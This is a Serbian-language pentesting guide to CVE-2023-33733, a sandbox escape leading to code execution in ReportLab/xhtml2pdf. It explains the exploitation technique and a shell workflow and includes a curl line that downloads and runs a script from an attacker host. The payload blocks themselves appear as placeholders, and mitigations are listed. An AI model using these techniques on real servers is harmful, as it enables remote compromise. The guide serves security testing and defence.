Kada testirati

• Aplikacije koje izlažu HTML-to-PDF export (profile, invoices, reports) i gde se u PDF metadata ili HTTP odgovorima vidi xhtml2pdf/ReportLab.
• exiftool profile.pdf | egrep 'Producer|Title|Creator' → "xhtml2pdf" producer
• HTTP odgovor za PDF često počinje komentarom generatora iz ReportLab-a

Kako bypass sandboksa funkcioniše

• rl_safe_eval uklanja ili zamenjuje mnoge builtine (getattr, type, pow, ...) i primenjuje filtriranje imena da odbije atribute koji počinju sa __ ili su u denylisti.
• Međutim, sigurne funkcije žive u globals rečniku dostupnom kao func.globals.
• Koristite type(type(1)) da povratite pravi builtin type funkciju (zaobilaženje ReportLab-ovog wrapper-a), zatim definišite klasu Word izvedenu iz str sa izmenjenim ponašanjem poređenja tako da:
  • .startswith('') → uvek False (zaobilaženje provere startswith(''))
  • .eq vraća False samo pri prvom poređenju (zaobilaženje provere članstva u denylisti) i True kasnije (tako da Python getattr radi)
  • .hash je jednak hash(str(self))
• Sa ovim, getattr(pow, Word('globals')) vraća globals dict omotane pow funkcije, koji uključuje importovani os modul. Zatim: ['os'].system('').

Minimalni obrazac eksploatacije (primer za atribut) Postavite payload unutar evaluiranog atributa i osigurajte da vrati validnu vrednost atributa preko boolean i 'red'.

exploit

• Obrazac sa list-comprehension dozvoljava jedini izraz prihvatljiv za rl_safe_eval.
• Trailing and 'red' vraća validnu CSS boju tako da renderovanje ne puca.
• Zamenite komandu po potrebi; koristite ping da potvrdite izvršenje pomoću tcpdump-a.

Operativni workflow

1. Identifikujte PDF generator

• PDF Producer prikazuje xhtml2pdf; HTTP odgovor sadrži ReportLab komentar.

2. Pronađite input koji se reflektuje u PDF (npr. profile bio/description) i pokrenite export.
3. Verifikujte izvršenje sa niskim šumom koristeći ICMP

• Pokrenite: sudo tcpdump -ni icmp
• Payload: ... system('ping <your_ip>') ...
• Windows često pošalje tačno četiri echo zahteva po defaultu.

4. Uspostavite shell

• Za Windows, pouzdan dvofazni pristup izbegava probleme sa quoting/encoding:
• Stage 1 (download):

exploit

• Stage 2 (execute):

exploit

• Za Linux meta, sličan dvofazni pristup sa curl/wget je moguć:
• system('curl http://ATTACKER/s.sh -o /tmp/s; sh /tmp/s')

Napomene i saveti

• Konteksti atributa: color je poznat evaluirani atribut; i drugi atributi u ReportLab markup-u mogu takođe evaluirati izraze. Ako je jedna lokacija sanitizovana, probajte druge koje se renderuju u PDF toku (različita polja, table styles, itd.).
• Quoting: Držite komande kompaktne. Dvofazni download značajno smanjuje probleme sa quoting-om i escaping-om.
• Pouzdanost: Ako su exporti keširani ili stavljeni u red, blago varirajte payload (npr. random path ili query) da izbegnete keširanje.

Mitigacije i detekcija

• Nadogradite ReportLab na 3.6.13 ili noviji (CVE-2023-33733 je ispravljen). Pratite sigurnosne advisore i u paketima distribucije.
• Ne prosleđujte korisnički kontrolisan HTML/markup direktno u xhtml2pdf/ReportLab bez striktne sanitizacije. Uklonite/odbijte [[[...]]] evaluacione konstrukte i vendor-specific tagove kada je input nepouzdan.
• Razmotrite onemogućavanje ili umotavanje korišćenja rl_safe_eval za nepouzdane inpute.
• Monitorišite sumnjive odlazne konekcije tokom generisanja PDF-a (npr. ICMP/HTTP sa app servera dok se exportuju dokumenti).

References

• PoC and technical analysis: c53elyas/CVE-2023-33733
• 0xdf University HTB write-up (real-world exploitation, Windows two-stage payloads): HTB: University
• NVD entry (affected versions): CVE-2023-33733
• xhtml2pdf docs (markup/page concepts): xhtml2pdf docs